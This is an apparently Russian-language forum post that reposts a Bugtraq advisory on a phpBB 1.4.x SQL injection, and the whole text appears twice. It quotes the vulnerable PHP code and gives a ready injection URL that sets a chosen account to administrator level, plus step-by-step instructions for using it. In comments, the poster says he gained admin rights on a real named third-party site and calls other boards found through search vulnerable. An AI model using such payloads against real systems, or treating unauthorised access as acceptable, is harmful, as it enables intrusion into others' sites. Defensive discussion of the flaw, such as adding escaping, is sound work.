anight
Новичок
phpBB 1.4.x exploit
вчера вечером по bugtraq проскочило:
-New phpBB 1.4.x exploit
phpBB, is an open source bulletin board created by the
phpBB group. Version 1.4.x of phpBB has a variable input
validation problem that can lead to limited arbitrary sql
querys including gaining administrative access to the board.
The problem lies in the fact that phpBB 1.4.x includes an
algorithm in the auth.php file which removes backslashes
that php automatically adds to GPC (Get/Post/Cookie)
variables.
<Example code from auth.php>
if(get_magic_quotes_gpc() == 1)
{
switch($REQUEST_METHOD){
case "POST":
while (list ($key, $val) = each ($HTTP_POST_VARS)){
if( is_array($val) ){
array_walk($val, 'stripslashes_array', '');
$$key = $val;}
else{
$$key = stripslashes($val);}
}
break;
</ End example code>
Therefore, certian php variables submitted through a URL
can reach an sql query with unescaped quotes, which is
not good for security reasons. In the prefs.php file such
a situation exists where a user can execute an arbitrary
query by supplying an certian value for the $viewemail
variable.
< Example sql query in prefs.php >
$sql = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes', user_attachsig = '$sig',
user_desmile = '$smile', user_html = '$dishtml',
user_bbcode = '$disbbcode', user_lang = '$lang' WHERE
(user_id = '$userdata[user_id]')";
</ End example code >
Example URL gives a username "l337h4x0r" level 4
(administrative) privileges the board:
<Example URL>
http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
</ End example URL>
Summary:
1. Register an account on a phpBB board version 1.4.x .
2. Enter above URL with the correct sitename and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of the page.
found by: [email protected]
http://www.modernhacker.com
--------------------------------------------
комментарии:
--------------------------------------------
лично я не согласен что проблема в auth.php
скорее в запросе неплохо бы добавлять addslashes()
сайт Offtopic32.phpclub.net подвержен этой уязвимости, права администратора я там получил, но "похозяйничать" не удалось, т.к. видимо каталог /admin дополнительно прикрыт .htaccess'om - молодцы!
phptalk.unet.ru/phpBB/ неподвержен этой уязвимости... видимо, там добавлены addslashes() в запрос. - поздравляю
все остальные phpBB доски объявлений, которые я нашел в yandex'e уязвимы.
вчера вечером по bugtraq проскочило:
-New phpBB 1.4.x exploit
phpBB, is an open source bulletin board created by the
phpBB group. Version 1.4.x of phpBB has a variable input
validation problem that can lead to limited arbitrary sql
querys including gaining administrative access to the board.
The problem lies in the fact that phpBB 1.4.x includes an
algorithm in the auth.php file which removes backslashes
that php automatically adds to GPC (Get/Post/Cookie)
variables.
<Example code from auth.php>
if(get_magic_quotes_gpc() == 1)
{
switch($REQUEST_METHOD){
case "POST":
while (list ($key, $val) = each ($HTTP_POST_VARS)){
if( is_array($val) ){
array_walk($val, 'stripslashes_array', '');
$$key = $val;}
else{
$$key = stripslashes($val);}
}
break;
</ End example code>
Therefore, certian php variables submitted through a URL
can reach an sql query with unescaped quotes, which is
not good for security reasons. In the prefs.php file such
a situation exists where a user can execute an arbitrary
query by supplying an certian value for the $viewemail
variable.
< Example sql query in prefs.php >
$sql = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes', user_attachsig = '$sig',
user_desmile = '$smile', user_html = '$dishtml',
user_bbcode = '$disbbcode', user_lang = '$lang' WHERE
(user_id = '$userdata[user_id]')";
</ End example code >
Example URL gives a username "l337h4x0r" level 4
(administrative) privileges the board:
<Example URL>
http://sitename/phpBBfolder/prefs.php?save=1&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
</ End example URL>
Summary:
1. Register an account on a phpBB board version 1.4.x .
2. Enter above URL with the correct sitename and replace l337h4x0r with your username.
3. Click on "Administration Panel" near the bottom of the page.
found by: [email protected]
http://www.modernhacker.com
--------------------------------------------
комментарии:
--------------------------------------------
лично я не согласен что проблема в auth.php
скорее в запросе неплохо бы добавлять addslashes()
сайт Offtopic32.phpclub.net подвержен этой уязвимости, права администратора я там получил, но "похозяйничать" не удалось, т.к. видимо каталог /admin дополнительно прикрыт .htaccess'om - молодцы!
phptalk.unet.ru/phpBB/ неподвержен этой уязвимости... видимо, там добавлены addslashes() в запрос. - поздравляю
все остальные phpBB доски объявлений, которые я нашел в yandex'e уязвимы.